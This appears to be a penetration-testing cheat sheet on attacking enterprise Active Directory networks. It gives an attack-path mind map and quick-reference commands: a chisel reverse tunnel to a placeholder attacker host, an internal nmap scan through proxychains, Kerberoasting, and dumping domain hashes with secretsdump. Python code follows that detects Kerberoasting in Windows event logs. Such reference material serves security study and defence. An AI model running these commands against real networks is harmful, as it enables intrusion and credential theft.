Enterprise Attack Simulation
Full scope enterprise penetration test
Attacking Enterprise Networks
Interactive Mind Map
graph TD
A[External] --> B[Phishing/Web]
B --> C[Initial Access]
C --> D[Internal Recon]
D --> E[Pivot/Tunnel]
E --> F[AD Enumeration]
F --> G[Lateral Movement]
G --> H[Privilege Escalation]
H --> I[Domain Admin]
I --> J[Data Exfiltration]
Quick Reference
Attack Path Overview
- External Recon: Subdomain enum, OSINT
- Initial Access: Web exploit, phishing
- Internal Pivot: Tunnel to internal network
- AD Compromise: Kerberoast, credential reuse
- Domain Admin: DCSync, Golden Ticket
External to Internal
    # Gain foothold via web app
    # Set up pivot
    chisel client ATTACKER:8000 R:socks  # Establish SOCKS tunnel
    # Scan internal
    proxychains nmap -sT 172.16.0.0/24  # Scan internal network via proxy
AD Takeover
    GetUserSPNs.py domain/user -dc-ip DC_IP -request  # Kerberoast
    impacket-secretsdump domain/admin@DC_IP  # Dump domain hashes
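Detection side of the Kerberoast step above, as an added example that is not part of the original page: it flags accounts that request RC4 (0x17) service tickets for several distinct user-backed service accounts in a short window, based on Windows Security event 4769. The dictionary field names, the sample records and the threshold and window values are assumptions made for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # ticket encryption type commonly seen in Kerberoast requests

# Constructed sample of parsed event 4769 records (not real logs).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "event_id": 4769, "account": "jsmith@CORP.LOCAL",
     "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-05-01T10:00:03", "event_id": 4769, "account": "jsmith@CORP.LOCAL",
     "service": "svc_web", "etype": "0x17"},
    {"time": "2024-05-01T10:00:09", "event_id": 4769, "account": "jsmith@CORP.LOCAL",
     "service": "svc_backup", "etype": "0x17"},
    {"time": "2024-05-01T10:02:00", "event_id": 4769, "account": "alice@CORP.LOCAL",
     "service": "svc_sql", "etype": "0x12"},   # AES256: normal
    {"time": "2024-05-01T10:03:00", "event_id": 4769, "account": "bob@CORP.LOCAL",
     "service": "FILE01$", "etype": "0x17"},   # machine account: skipped
    {"time": "2024-05-01T10:04:00", "event_id": 4769, "account": "carol@CORP.LOCAL",
     "service": "svc_sql", "etype": "0x17"},   # single request: below threshold
]


def kerberoast_suspects(events, min_services=3, window=timedelta(minutes=5)):
    """Return {account: sorted service names} for accounts that requested RC4
    tickets for at least min_services distinct service accounts within window."""
    requests = defaultdict(list)
    for ev in events:
        if ev["event_id"] != 4769 or ev["etype"].lower() != RC4_HMAC:
            continue
        service = ev["service"]
        # Machine accounts and krbtgt have long random keys, so they are not
        # the interesting targets for offline cracking.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        requests[ev["account"]].append((datetime.fromisoformat(ev["time"]), service))

    suspects = {}
    for account, reqs in requests.items():
        reqs.sort()
        # Slide a window forward from each request and count distinct services.
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                suspects[account] = sorted(services)
                break
    return suspects


if __name__ == "__main__":
    for account, services in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

In a domain where service accounts are restricted to AES, any RC4 request for a user-backed service account is worth alerting on, so min_services can be lowered to 1.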